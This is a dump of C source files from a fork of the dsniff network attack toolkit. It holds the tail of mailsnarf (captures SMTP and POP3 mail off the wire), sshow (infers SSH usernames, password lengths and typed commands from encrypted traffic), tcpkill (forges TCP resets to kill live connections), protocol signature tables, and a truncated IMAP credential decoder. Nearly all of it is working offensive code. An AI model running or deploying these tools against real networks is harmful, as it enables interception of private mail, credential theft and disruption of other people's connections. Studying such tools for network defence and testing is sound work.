"\n" "Usage: mailsnarf [-i interface | -p pcapfile] [[-v] pattern [expression]]\n"); exit(1); } static int regex_match(char *string) { return (pregex == NULL || ((regexec(pregex, string, 0, NULL, 0) == 0) ^ Opt_invert)); } static char * grep_mail_address(char *buf) { char *p, *q; if ((p = strchr(buf, '<')) != NULL) { p++; if ((q = strchr(p, '>')) != NULL) *q = '\0'; if (strlen(p) > 0) return (strdup(p)); } return (NULL); } static void print_mbox_msg(char *from, char *msg) { char *p; time_t t; t = time(NULL); if (from == NULL) from = "mailsnarf"; printf("From %s %s", from, ctime(&t)); while ((p = strsep(&msg, "\n")) != NULL) { if (strncmp(p, "From ", 5) == 0) putchar('>'); for (; *p != '\r' && *p != '\0'; p++) putchar(*p); putchar('\n'); } putchar('\n'); fflush(stdout); } static int process_pop_client(struct pop_info *pop, char *data, int len) { struct buf *line, buf; int i; buf_init(&buf, data, len); while ((i = buf_index(&buf, "\r\n", 2)) >= 0) { line = buf_tok(&buf, NULL, i + 2); line->base[line->end] = '\0'; if (strncasecmp(buf_ptr(line), "RETR ", 5) == 0) { pop->state = POP_RETR; } else pop->state = POP_NONE; } return (len - buf_len(&buf)); } static int process_pop_server(struct pop_info *pop, char *data, int len) { struct buf *line, *body, buf; int i; buf_init(&buf, data, len); if (pop->state == POP_NONE) return (len); if (pop->state == POP_RETR) { if ((i = buf_index(&buf, "\r\n", 2)) < 0) return (0); line = buf_tok(&buf, NULL, i + 2); if (buf_cmp(line, "+OK", 3) == 0) { pop->state = POP_DATA; } else pop->state = POP_NONE; } if (pop->state == POP_DATA) { if ((i = buf_index(&buf, "\r\n.\r\n", 5)) >= 0) { body = buf_tok(&buf, NULL, i); buf_skip(&buf, 5); body->base[body->end] = '\0'; if (regex_match(buf_ptr(body))) print_mbox_msg(NULL, buf_ptr(body)); pop->state = POP_NONE; } } return (len - buf_len(&buf)); } static int process_smtp_client(struct smtp_info *smtp, char *data, int len) { struct buf *line, *body, buf; char *p; int i; buf_init(&buf, data, len); if (smtp->state != SMTP_DATA) { while ((i = buf_index(&buf, "\r\n", 2)) >= 0) { line = buf_tok(&buf, NULL, i + 2); line->base[line->end-1] = '\0'; p = buf_ptr(line); if (strncasecmp(p, "RSET", 4) == 0) { smtp->state = SMTP_HELO; } else if (smtp->state == SMTP_NONE && (strncasecmp(p, "HELO", 4) == 0 || strncasecmp(p, "EHLO", 4) == 0)) { smtp->state = SMTP_HELO; } else if (smtp->state == SMTP_HELO && (strncasecmp(p, "MAIL ", 5) == 0 || strncasecmp(p, "SEND ", 5) == 0 || strncasecmp(p, "SAML ", 5) == 0)) { smtp->from = grep_mail_address(p); smtp->state = SMTP_MAIL; } else if (smtp->state == SMTP_MAIL && strncasecmp(p, "RCPT ", 5) == 0) { smtp->state = SMTP_RCPT; } else if (smtp->state == SMTP_RCPT && strncasecmp(p, "DATA", 4) == 0) { smtp->state = SMTP_DATA; break; } } } if (smtp->state == SMTP_DATA) { if ((i = buf_index(&buf, "\r\n.\r\n", 5)) >= 0) { body = buf_tok(&buf, NULL, i); buf_skip(&buf, 5); body->base[body->end] = '\0'; if (regex_match(buf_ptr(body))) print_mbox_msg(smtp->from, buf_ptr(body)); if (smtp->from) { free(smtp->from); smtp->from = NULL; } smtp->state = SMTP_HELO; } } return (len - buf_len(&buf)); } static void sniff_pop_session(struct tcp_stream *ts, struct pop_info **pop_save) { struct pop_info *pop; int i; if (ts->addr.dest != 110 && ts->addr.source != 110 && /* POP3 */ ts->addr.dest != 109 && ts->addr.source != 109 && /* POP2 */ ts->addr.dest != 1109 && ts->addr.source != 1109) /* KPOP */ return; switch (ts->nids_state) { case NIDS_JUST_EST: ts->server.collect = 1; ts->client.collect = 1; if ((pop = (struct pop_info *) malloc(sizeof(*pop))) == NULL) nids_params.no_mem("sniff_pop_session"); pop->state = POP_NONE; *pop_save = pop; break; case NIDS_DATA: pop = *pop_save; if (ts->server.count_new > 0) { i = process_pop_client(pop, ts->server.data, ts->server.count - ts->server.offset); nids_discard(ts, i); } else if (ts->client.count_new > 0) { i = process_pop_server(pop, ts->client.data, ts->client.count - ts->client.offset); nids_discard(ts, i); } break; default: pop = *pop_save; if (ts->server.count > 0) process_pop_client(pop, ts->server.data, ts->server.count - ts->server.offset); else if (ts->client.count > 0) process_pop_server(pop, ts->client.data, ts->client.count - ts->client.offset); free(pop); break; } } /* XXX - Minimal SMTP FSM. We don't even consider server responses. */ static void sniff_smtp_client(struct tcp_stream *ts, struct smtp_info **smtp_save) { struct smtp_info *smtp; int i; if (ts->addr.dest != 25) return; switch (ts->nids_state) { case NIDS_JUST_EST: ts->server.collect = 1; if ((smtp = (struct smtp_info *)malloc(sizeof(*smtp))) == NULL) nids_params.no_mem("sniff_smtp_client"); smtp->state = SMTP_NONE; smtp->from = NULL; *smtp_save = smtp; break; case NIDS_DATA: smtp = *smtp_save; if (ts->server.count_new > 0) { i = process_smtp_client(smtp, ts->server.data, ts->server.count - ts->server.offset); nids_discard(ts, i); } break; default: smtp = *smtp_save; if (ts->server.count > 0) { process_smtp_client(smtp, ts->server.data, ts->server.count - ts->server.offset); } if (smtp->from) free(smtp->from); free(smtp); break; } } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; while ((c = getopt(argc, argv, "i:p:vh?V")) != -1) { switch (c) { case 'i': nids_params.device = optarg; break; case 'p': nids_params.filename = optarg; break; case 'v': Opt_invert = 1; break; default: usage(); } } argc -= optind; argv += optind; if (argc > 0 && strlen(argv[0])) { if ((pregex = (regex_t *) malloc(sizeof(*pregex))) == NULL) err(1, "malloc"); if (regcomp(pregex, argv[0], REG_EXTENDED|REG_NOSUB) != 0) errx(1, "invalid regular expression"); } if (argc > 1) nids_params.pcap_filter = copy_argv(argv + 1); nids_params.scan_num_hosts = 0; nids_params.syslog = null_syslog; if (!nids_init()) errx(1, "%s", nids_errbuf); nids_register_tcp(sniff_smtp_client); nids_register_tcp(sniff_pop_session); if (nids_params.pcap_filter != NULL) { if (nids_params.filename == NULL) { warnx("listening on %s [%s]", nids_params.device, nids_params.pcap_filter); } else { warnx("using %s [%s]", nids_params.filename, nids_params.pcap_filter); } } else { if (nids_params.filename == NULL) { warnx("listening on %s", nids_params.device); } else { warnx("using %s", nids_params.filename); } } nids_run(); /* NOTREACHED */ exit(0); } hackerschoice-dsniff-a17510d/sshow.c0000664000175000017500000004130315105626144017322 0ustar epsilonepsilon/* * sshow.c * * Passive SSH traffic analysis. * * http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt * * Copyright (c) 2000-2001 Solar Designer * Copyright (c) 2000 Dug Song * * $Id: sshow.c,v 1.2 2001/03/19 06:52:15 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcaputil.h" #if !defined(NIDS_MAJOR) || (NIDS_MAJOR == 1 && NIDS_MINOR < 15) #error This program requires libnids 1.15+ #endif #define HISTORY_SIZE 16 typedef struct { u_int min, max; } range; typedef struct { int direction; /* 0 for client to server */ clock_t timestamp; /* timestamp of this packet */ u_int cipher_size; /* ciphertext size */ range plain_range; /* possible plaintext sizes */ } record; struct history { record packets[HISTORY_SIZE]; /* recent packets (circular list) */ int index; /* next (free) index into packets[] */ u_int directions; /* recent directions (bitmask) */ clock_t timestamps[2]; /* last timestamps in each direction */ }; struct line { int input_count; /* input packets (client to server) */ int input_size; /* input size (estimated) */ int input_last; /* last input packet size */ int echo_count; /* echo packets (server to client) */ }; struct session { int protocol; /* -1 not SSH, 0 unknown, 1 or 2 once known */ int state; /* 1 after username, 2 after authentication */ int compressed; /* whether compression is known to be used */ struct history history; /* session history */ struct line line; /* current command line */ }; static int debug = 0; static clock_t now; static void usage(void) { fprintf(stderr, "Usage: sshow [-d] [-i interface | -p pcapfile]\n"); exit(1); } static clock_t add_history(struct session *session, int direction, u_int cipher_size, range *plain_range) { record *current; clock_t delay; current = &session->history.packets[session->history.index++]; session->history.index %= HISTORY_SIZE; current->direction = direction; current->timestamp = now; current->cipher_size = cipher_size; current->plain_range = *plain_range; session->history.directions <<= 1; session->history.directions |= direction; delay = now - session->history.timestamps[direction]; session->history.timestamps[direction] = now; return (delay); } static record * get_history(struct session *session, int age) { int index; index = session->history.index + (HISTORY_SIZE - 1) - age; index %= HISTORY_SIZE; return (&session->history.packets[index]); } static char * s_saddr(struct tcp_stream *ts) { static char output[32]; snprintf(output, sizeof(output), "%s:%u", inet_ntoa(*((struct in_addr *)&ts->addr.saddr)), ts->addr.source); return (output); } static char * s_daddr(struct tcp_stream *ts) { static char output[32]; snprintf(output, sizeof(output), "%s:%u", inet_ntoa(*((struct in_addr *)&ts->addr.daddr)), ts->addr.dest); return (output); } static char * s_range(range *range) { static char output[32]; snprintf(output, sizeof(output), range->min == range->max ? "%u" : "%u to %u", range->min, range->max); return (output); } static void print_data(struct half_stream *stream, u_int count) { u_int i; int printable; printable = 1; for (i = 0; i < count; i++) { printf("%02x%c", (int)(u_char)stream->data[i], i < count - 1 && i % 24 != 23 ? ' ' : '\n'); printable &= isprint(stream->data[i]) || stream->data[i] == '\n'; } if (printable && count >= 4 && !memcmp(stream->data, "SSH-", 4)) fwrite(stream->data, count, 1, stdout); } static u_int ssh1_plain_size(struct half_stream *stream) { if (stream->count_new < 4) return (0); return (u_int)(u_char)stream->data[3] | ((u_int)(u_char)stream->data[2] << 8) | ((u_int)(u_char)stream->data[1] << 16) | ((u_int)(u_char)stream->data[0] << 24); } static u_int ssh1_cipher_size(struct half_stream *stream) { return (4 + ((ssh1_plain_size(stream) + 8) & ~7)); } static range * ssh1_plain_range(struct half_stream *stream) { static range output; output.min = output.max = ssh1_plain_size(stream) - 5; return (&output); } static range * ssh2_plain_range(struct half_stream *stream) { static range output; output.max = stream->count_new - 16; /* Assume min padding + 8-byte cipher blocksize */ output.min = output.max - 7; if ((int)output.min < 0) output.min = 0; return (&output); } static void client_to_server(struct tcp_stream *ts, struct session *session, u_int cipher_size, range *plain_range) { clock_t delay; int payload; #if defined(_SC_CLK_TCK) long CLK_TCK = sysconf(_SC_CLK_TCK); #endif delay = add_history(session, 0, cipher_size, plain_range); if (debug) printf("- %s -> %s: DATA (%s bytes, %.2f seconds)\n", s_saddr(ts), s_daddr(ts), s_range(plain_range), (float)delay / CLOCKS_PER_SEC); if (debug > 1) print_data(&ts->server, cipher_size); payload = plain_range->min; if (session->state == 2 && payload > 0) { session->line.input_count++; session->line.input_last = payload; if (session->protocol == 1) payload -= 4; else { payload -= 20 + 1; /* Assume several SSH-2 packets in this IP packet */ if (payload % 44 == 0) { session->line.input_count += payload / 44; /* One character per SSH-2 packet (typical) */ payload += payload / 44; payload %= 44; } payload++; } if (payload <= 0) { if (payload < 0 && !session->compressed && session->protocol == 1) { session->compressed = 1; printf("+ %s -> %s: Compression detected, " "guesses will be much less reliable\n", s_saddr(ts), s_daddr(ts)); } payload = 1; } session->line.input_size += payload; } } static void server_to_client(struct tcp_stream *ts, struct session *session, u_int cipher_size, range *plain_range) { clock_t delay; int skip; range string_range; #if defined(_SC_CLK_TCK) long CLK_TCK = sysconf(_SC_CLK_TCK); #endif delay = add_history(session, 1, cipher_size, plain_range); if (debug) printf("- %s <- %s: DATA (%s bytes, %.2f seconds)\n", s_saddr(ts), s_daddr(ts), s_range(plain_range), (float)delay / CLOCKS_PER_SEC); if (debug > 1) print_data(&ts->client, cipher_size); /* * Some of the checks may want to skip over multiple server responses. * For example, there's a debugging packet sent for every option found * in authorized_keys, but we can't use those packets in our pattern. */ skip = 0; while (((session->history.directions >> skip) & 3) == 3) if (++skip > HISTORY_SIZE - 5) break; if (session->state == 0 && session->protocol == 1 && ((session->history.directions >> skip) & 7) == 5 && plain_range->min == 0 && get_history(session, skip + 1)->plain_range.min > 4 && get_history(session, skip + 2)->plain_range.min == 0) { session->state = 1; string_range = get_history(session, skip + 1)->plain_range; string_range.min -= 4; string_range.max -= 4; printf("+ %s -> %s: GUESS: Username length is %s\n", s_saddr(ts), s_daddr(ts), s_range(&string_range)); return; } if (session->state == 1 && #ifdef USE_TIMING now - get_history(session, 2)->timestamp >= CLOCKS_PER_SEC && #endif session->protocol == 1 && (session->history.directions & 7) == 5 && plain_range->min == 0 && get_history(session, 1)->plain_range.min > 4 && get_history(session, 2)->plain_range.min == 0) { session->state = 2; string_range = get_history(session, 1)->plain_range; string_range.min -= 4; string_range.max -= 4; printf("+ %s -> %s: GUESS: Password authentication, " "password length %s %s%s\n", s_saddr(ts), s_daddr(ts), string_range.min == 32 ? "appears to be" : "is", s_range(&string_range), string_range.min == 32 ? " (padded?)" : ""); } if (session->state == 0 && session->protocol == 2 && (session->history.directions & 7) == 5) { if (plain_range->min == 4 + 9) { string_range = get_history(session, 1)->plain_range; if (string_range.min > 500 && string_range.min < 600) { session->state = 2; printf("+ %s -> %s: GUESS: DSA " "authentication accepted\n", s_saddr(ts), s_daddr(ts)); } else if (string_range.min > 42 + 9) { session->state = 2; printf("+ %s -> %s: GUESS: Password " "authentication accepted\n", s_saddr(ts), s_daddr(ts)); } } else if (plain_range->min > 12 + 9 && plain_range->min < 56 + 9) { string_range = get_history(session, 1)->plain_range; if (string_range.min > 500 && string_range.min < 600) printf("+ %s -> %s: GUESS: DSA " "authentication failed\n", s_saddr(ts), s_daddr(ts)); else if (string_range.min > 42 + 9) printf("+ %s -> %s: GUESS: Password " "authentication failed\n", s_saddr(ts), s_daddr(ts)); } } if (session->state == 1 && session->protocol == 1 && (session->history.directions & 3) == 1 && plain_range->min == 0 && get_history(session, 1)->plain_range.min == 130) { printf("+ %s -> %s: GUESS: RSA authentication refused\n", s_saddr(ts), s_daddr(ts)); } if (session->state == 1 && session->protocol == 1 && skip >= 1 && ((session->history.directions >> (skip - 1)) & 037) == 013 && plain_range->min == 0 && get_history(session, skip - 1 + 2)->plain_range.min == 16 && get_history(session, skip - 1 + 3)->plain_range.min == 130 && get_history(session, skip - 1 + 4)->plain_range.min == 130) { char *what; switch (get_history(session, 1)->plain_range.min - 4) { case 28: /* "RSA authentication accepted." */ session->state = 2; if (skip > 1 && (what = alloca(64))) { snprintf(what, 64, "accepted " "(%d+ authorized_keys option%s)", skip - 1, skip - 1 == 1 ? "" : "s"); break; } what = "accepted"; break; case 47: /* "Wrong response to RSA authentication challenge." */ what = "failed"; break; default: what = "???"; } printf("+ %s -> %s: GUESS: RSA authentication %s\n", s_saddr(ts), s_daddr(ts), what); } if (session->state == 2) { session->line.echo_count++; /* Check for backspace */ if (session->protocol == 1 && !session->compressed && plain_range->min == 4 + 3 && session->line.input_size >= 2) session->line.input_size -= 2; if (plain_range->min > 4 + session->line.input_last && session->line.input_count >= 2 && session->line.input_size >= 2) { int size; char *what; size = session->line.input_size; if (session->line.echo_count + 1 >= session->line.input_count && size <= (session->line.input_count << 2) && size < 0x100) { what = "(command) line"; } else { if (session->line.echo_count <= 2 && size <= (session->line.input_count << 1) && size >= 2 + 1 && size <= 40 + 1) { what = "password"; } else what = NULL; } if (debug) { printf("- %s -> %s: sent %d packets " "(%d characters), seen %d replies\n", s_saddr(ts), s_daddr(ts), session->line.input_count, size, session->line.echo_count); } if (what) { printf("+ %s -> %s: GUESS: " "a %s of %d character%s\n", s_saddr(ts), s_daddr(ts), what, size - 1, size == 2 ? "" : "s"); } } if (plain_range->min <= 0 || plain_range->min > 4 + session->line.input_last) { session->line.input_count = 0; session->line.input_size = 0; session->line.echo_count = 0; } } } static void process_data(struct tcp_stream *ts, struct session *session) { u_int have, need; char *lf; if (session->protocol < 0) return; if (ts->client.count_new && (have = ts->client.count - ts->client.offset)) { switch (session->protocol) { case 1: if (have < (need = ssh1_cipher_size(&ts->client))) { if (debug) { printf("- %s <- %s: got %u of " "%u bytes\n", s_saddr(ts), s_daddr(ts), have, need); } nids_discard(ts, 0); return; } if (have != need && debug) { printf("- %s <- %s: left %u bytes\n", s_saddr(ts), s_daddr(ts), have - need); } nids_discard(ts, need); server_to_client(ts, session, need, ssh1_plain_range(&ts->client)); return; case 2: server_to_client(ts, session, have, ssh2_plain_range(&ts->client)); return; default: break; } } if (ts->server.count_new && (have = ts->server.count - ts->server.offset)) { if (!session->protocol) { lf = (char *)memchr(ts->server.data, '\n', have); if (have < 7 || (!lf && have < 0x100)) { nids_discard(ts, 0); return; } if (lf && !memcmp(ts->server.data, "SSH-", 4)) session->protocol = ts->server.data[4] - '0'; /* some clients announce SSH-1.99 instead of SSH-2.0 */ if (session->protocol == 1 && ts->server.data[5] == '.' && ts->server.data[6] == '9') { session->protocol = 2; } if (session->protocol != 1 && session->protocol != 2) { session->protocol = -1; if (debug) { printf("- %s -> %s: not SSH\n", s_saddr(ts), s_daddr(ts)); } return; } need = lf - ts->server.data + 1; nids_discard(ts, need); printf("+ %s -> %s: SSH protocol %d\n", s_saddr(ts), s_daddr(ts), session->protocol); if (debug) print_data(&ts->server, have); return; } switch (session->protocol) { case 1: if (have < (need = ssh1_cipher_size(&ts->server))) { if (debug) { printf("- %s -> %s: got %u of " "%u bytes\n", s_saddr(ts), s_daddr(ts), have, need); } nids_discard(ts, 0); return; } if (have != need && debug) { printf("- %s -> %s: left %u bytes\n", s_saddr(ts), s_daddr(ts), have - need); } nids_discard(ts, need); client_to_server(ts, session, need, ssh1_plain_range(&ts->server)); return; case 2: client_to_server(ts, session, have, ssh2_plain_range(&ts->server)); } } } static void process_event(struct tcp_stream *ts, struct session **session) { struct tms buf; char *what; now = times(&buf); what = NULL; switch (ts->nids_state) { case NIDS_JUST_EST: ts->client.collect = 1; ts->server.collect = 1; if (debug) { printf("- %s -> %s: ESTABLISHED\n", s_saddr(ts), s_daddr(ts)); } if (!(*session = calloc(1, sizeof(**session)))) { err(1, "calloc"); } (*session)->history.timestamps[0] = now; (*session)->history.timestamps[1] = now; return; case NIDS_CLOSE: what = "CLOSED"; case NIDS_RESET: if (!what) what = "RESET"; case NIDS_TIMED_OUT: if (!what) what = "TIMED OUT"; if ((*session)->protocol > 0) { printf("+ %s -- %s: %s\n", s_saddr(ts), s_daddr(ts), what); } else if (debug) { printf("- %s -- %s: %s\n", s_saddr(ts), s_daddr(ts), what); } free(*session); return; case NIDS_DATA: process_data(ts, *session); return; } } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } static void cleanup(int signum) { exit(0); /* Just so that atexit(3) jobs are called */ } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; while ((c = getopt(argc, argv, "di:p:h?")) != -1) { switch (c) { case 'd': debug++; break; case 'i': nids_params.device = optarg; break; case 'p': nids_params.filename = optarg; break; default: usage(); break; } } argc -= optind; argv += optind; signal(SIGTERM, cleanup); signal(SIGINT, cleanup); signal(SIGHUP, cleanup); setlinebuf(stdout); if (argc > 0) { nids_params.pcap_filter = copy_argv(argv); } else nids_params.pcap_filter = "tcp"; nids_params.syslog = null_syslog; nids_params.scan_num_hosts = 0; nids_params.one_loop_less = 1; if (!nids_init()) errx(1, "nids_init: %s", nids_errbuf); nids_register_tcp(process_event); if (nids_params.pcap_filter != NULL) { if (nids_params.filename == NULL) { warnx("listening on %s [%s]", nids_params.device, nids_params.pcap_filter); } else { warnx("using %s [%s]", nids_params.filename, nids_params.pcap_filter); } } else { if (nids_params.filename == NULL) { warnx("listening on %s", nids_params.device); } else { warnx("using %s", nids_params.filename); } } nids_run(); return (0); } hackerschoice-dsniff-a17510d/tcpkill.c0000664000175000017500000000614215105626144017623 0ustar epsilonepsilon/* * tcpkill.c * * Kill TCP connections already in progress. * * Copyright (c) 2000 Dug Song * * $Id: tcpkill.c,v 1.17 2001/03/17 08:10:43 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include "pcaputil.h" #define DEFAULT_SEVERITY 3 int Opt_severity = DEFAULT_SEVERITY; int pcap_off; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: tcpkill [-i interface] [-1..9] expression\n"); exit(1); } static void tcp_kill_cb(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt) { struct libnet_ipv4_hdr *ip; struct libnet_tcp_hdr *tcp; u_char ctext[64]; u_int32_t seq, win; int i, len; libnet_t *l; l = (libnet_t *)user; pkt += pcap_off; len = pcap->caplen - pcap_off; ip = (struct libnet_ipv4_hdr *)pkt; if (ip->ip_p != IPPROTO_TCP) return; tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2)); if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST)) return; seq = ntohl(tcp->th_ack); win = ntohs(tcp->th_win); snprintf(ctext, sizeof(ctext), "%s:%d > %s:%d:", libnet_addr2name4(ip->ip_src.s_addr, LIBNET_DONT_RESOLVE), ntohs(tcp->th_sport), libnet_addr2name4(ip->ip_dst.s_addr, LIBNET_DONT_RESOLVE), ntohs(tcp->th_dport)); for (i = 0; i < Opt_severity; i++) { seq += (i * win); libnet_clear_packet(l); libnet_build_tcp(ntohs(tcp->th_dport), ntohs(tcp->th_sport), seq, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H, NULL, 0, l, 0); libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0, ip->ip_dst.s_addr, ip->ip_src.s_addr, NULL, 0, l, 0); if (libnet_write(l) < 0) warn("write"); fprintf(stderr, "%s R %lu:%lu(0) win 0\n", ctext, seq, seq); } } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; char *p, *intf, *filter, ebuf[PCAP_ERRBUF_SIZE]; char libnet_ebuf[LIBNET_ERRBUF_SIZE]; libnet_t *l; pcap_t *pd; intf = NULL; while ((c = getopt(argc, argv, "i:123456789h?V")) != -1) { switch (c) { case 'i': intf = optarg; break; case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': p = argv[optind - 1]; if (p[0] == '-' && p[1] == c && p[2] == '\0') Opt_severity = atoi(++p); else Opt_severity = atoi(argv[optind] + 1); break; default: usage(); break; } } if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) errx(1, "%s", ebuf); argc -= optind; argv += optind; if (argc == 0) usage(); filter = copy_argv(argv); if ((pd = pcap_init_dsniff(intf, filter, 64)) == NULL) errx(1, "couldn't initialize sniffing"); if ((pcap_off = pcap_dloff(pd)) < 0) errx(1, "couldn't determine link layer offset"); if ((l = libnet_init(LIBNET_RAW4, intf, libnet_ebuf)) == NULL) errx(1, "couldn't initialize sending"); libnet_seed_prand(l); warnx("listening on %s [%s]", intf, filter); pcap_loop(pd, -1, tcp_kill_cb, (u_char *)l); /* NOTREACHED */ exit(0); } hackerschoice-dsniff-a17510d/buf.h0000664000175000017500000000350115105626144016736 0ustar epsilonepsilon/* * buf.h * * Buffer manipulation routines. * * Copyright (c) 2000 Dug Song * * $Id: buf.h,v 1.6 2001/03/15 08:33:05 dugsong Exp $ */ #ifndef BUF_H #define BUF_H typedef struct buf { u_char *base; int size; int offset; int end; } *buf_t; /* Initialize buffer. */ void buf_init(buf_t buf, u_char *data, int len); /* Allocate buffer. */ buf_t buf_new(int size); /* Free buffer. */ void buf_free(buf_t buf); /* Return pointer to buffer data. */ #define buf_ptr(b) ((b)->base + (b)->offset) /* Return length of buffer data. */ #define buf_len(b) ((b)->end - (b)->offset) /* Return remaining length of unused buffer. */ #define buf_left(b) ((b)->size - (b)->offset) /* Return size of buffer. */ #define buf_size(b) ((b)->size) /* Return offset in buffer. */ #define buf_tell(b) ((b)->offset) /* Reposition buffer offset. */ int buf_seek(buf_t buf, int offset, int whence); #define buf_skip(b, l) buf_seek(b, l, SEEK_CUR) #define buf_rewind(b) buf_seek(b, 0, SEEK_SET) /* Read from buffer. */ int buf_get(buf_t buf, void *dst, int len); /* Write to buffer. */ int buf_put(buf_t buf, void *src, int len); int buf_putf(buf_t buf, const char *fmt, ...); /* Finalize buffer. */ void buf_end(buf_t buf); /* Locate byte string in buffer. */ int buf_index(buf_t buf, void *ptr, int len); int buf_rindex(buf_t buf, void *ptr, int len); /* Compare buffer to byte string. */ int buf_cmp(buf_t buf, void *ptr, int len); /* Tokenize buffer, like strtok(3). */ buf_t buf_tok(buf_t buf, void *sep, int len); /* Get a sub-buffer from buffer. */ buf_t buf_getbuf(buf_t buf, int offset, int len); /* Get a word from buffer. */ buf_t buf_getword(buf_t buf, void *sep, int len); /* Convert buffer to allocated string. */ char * buf_strdup(buf_t buf); /* ASCII string test. */ int buf_isascii(buf_t buf); #endif /* BUF_H */ hackerschoice-dsniff-a17510d/dsniff_magic.h0000664000175000017500000000536115105626144020601 0ustar epsilonepsilon// grep -v ^# dsniff.magic | while read -r x; do echo '"'"${x//\\/\\\\}"'", \'; done >>dsniff_magic.h static char *mgx[] = {\ "0 string BEGIN\\ cvs", \ "", \ "0 string SYST ftp", \ "0 string USER\\ ftp ftp", \ "0 string USER\\ anonymous ftp", \ "", \ "0 string HELO\\ smtp", \ "0 string EHLO\\ smtp", \ "", \ "0 string GET\\ / http", \ "0 string POST\\ / http", \ "0 string CONNECT\\ http", \ "", \ "1 string \\ ID\\ imap", \ "2 string \\ ID\\ imap", \ "3 string \\ ID\\ imap", \ "4 string \\ ID\\ imap", \ "5 string \\ ID\\ imap", \ "", \ "1 string \\ LOGIN\\ imap", \ "2 string \\ LOGIN\\ imap", \ "3 string \\ LOGIN\\ imap", \ "4 string \\ LOGIN\\ imap", \ "5 string \\ LOGIN\\ imap", \ "", \ "1 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ "2 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ "3 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ "4 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ "5 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ "", \ "0 string NICK\\ irc", \ "", \ "0 string USER\\ pop3", \ "0 string AUTH\\ pop3", \ "", \ "12 string MIT-MAGIC x11", \ "", \ "0 string LIST nntp", \ "0 string GROUP nntp", \ "0 string NEW nntp", \ "0 string ARTICLE nntp", \ "", \ "0 belong 0x7f7f4943", \ ">4 beshort 0x4100 citrix", \ "", \ "", \ "0 beshort 0x1603", \ ">2 byte 0x01", \ ">>5 byte 0x01", \ ">>>9 byte 0x03 https", \ "", \ "8 belong 0x0135012c", \ ">12 belong 0x0c010800", \ ">>16 belong 0x7fff7f08", \ ">>>20 belong 0x00000001 oracle", \ "", \ "0 belong 0x0", \ ">4 byte 0x8d pcanywhere", \ ">5 byte 0x6 pcanywhere", \ "", \ "132 belong 0x0301060a", \ ">242 belong 0 tds", \ "32 belong 0xe0031000", \ ">36 belong 0x2c010000 tds", \ "", \ "12 belong 100000", \ ">4 belong 0", \ ">>8 belong 2 portmap", \ "12 belong 100005", \ ">4 belong 0", \ ">>8 belong 2 mountd", \ "12 belong 100009", \ ">4 belong 0", \ ">>8 belong 2 yppasswd", \ "", \ "16 belong 100000", \ ">8 belong 0", \ ">>12 belong 2 portmap", \ "16 belong 100005", \ ">8 belong 0", \ ">>12 belong 2 mountd", \ "16 belong 100009", \ ">8 belong 0", \ ">>12 belong 2 yppasswd", \ "", \ "0 belong 296", \ ">4 belong 0x20000 postgresql", \ "", \ "0 belong 0x81000048", \ ">33 string CACA smb", \ "", \ "0 beshort >0xfff9", \ ">2 byte <40", \ ">>3 beshort >0xfff9", \ ">>>5 byte <40 telnet", \ "", \ "0 string SSH- ssh", \ "", \ "", \ "0 byte 0x38", \ ">8 belong 0x00002455 mmxp", \ "", \ "0 byte 5", \ ">6 leshort 260", \ ">>32 byte 0 sniffer", \ ">6 leshort 261", \ ">>32 lelong -1 sniffer", \ ">1 belong 0", \ ">>5 byte 0 icq", \ ">(1.b+1) byte 1 socks", \ "", \ "0 byte&0x1f 16", \ ">2 byte&0x1f 2", \ ">>5 byte 0x60 ldap", \ ">4 byte&0x1f 2", \ ">>5 beshort&0xfffc 0x0100", \ ">>>7 byte&0x1f 4 snmp", \ }; hackerschoice-dsniff-a17510d/arp.h0000664000175000017500000000044315105626144016746 0ustar epsilonepsilon/* * arp.h * * ARP cache routines. * * Copyright (c) 1999 Dug Song * * $Id: arp.h,v 1.1 2001/03/15 08:27:08 dugsong Exp $ */ #ifndef _ARP_H_ #define _ARP_H_ int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* linf); #endif /* _ARP_H_ */ hackerschoice-dsniff-a17510d/decode_imap.c0000664000175000017500000000317415105626144020414 0ustar epsilonepsilon/* * decode_imap.c * * Internet Mail Access Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_imap.c,v 1.5 2001/03/15 08:33:00 dugsong Exp $ */ #include "config.h" #include #include #include #include "base64.h" #include "decode.h" #include "buf.h" extern struct _dc_meta dc_meta; int decode_imap(u_char *buf, int len, u_char *obuf, int olen) { char *p; char *ptr; int need_more = 0; enum { NONE, AUTHPLAIN, AUTHMULTI, USERPASS } mode = NONE; obuf[0] = '\0'; for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { if (need_more == 0) { // skip ID if ((ptr = strchr(p, ' ')) == NULL) break; p = ++ptr; } if (mode == NONE) { if (strncasecmp(p, "AUTHENTICATE PLAIN", 18) == 0) { mode = AUTHPLAIN; need_more = 1; continue; } else if ((strncasecmp(p, "AUTHENTICATE ", 13) == 0) || (strncasecmp(p, "LOGIN {", 7) == 0)) { strlcat(obuf, p, olen); mode = AUTHMULTI; need_more = 2; continue; } else if (strncasecmp(p, "LOGIN ", 6) == 0) { mode = USERPASS; // FALL-THROUGH. } else continue; } if (mode == USERPASS) { snprintf(obuf, olen, "%s\n", p + 6 /* 'LOGIN '*/); break; } if (mode == AUTHPLAIN) { char *u , *pass; if (decode_authplain(p, &u, 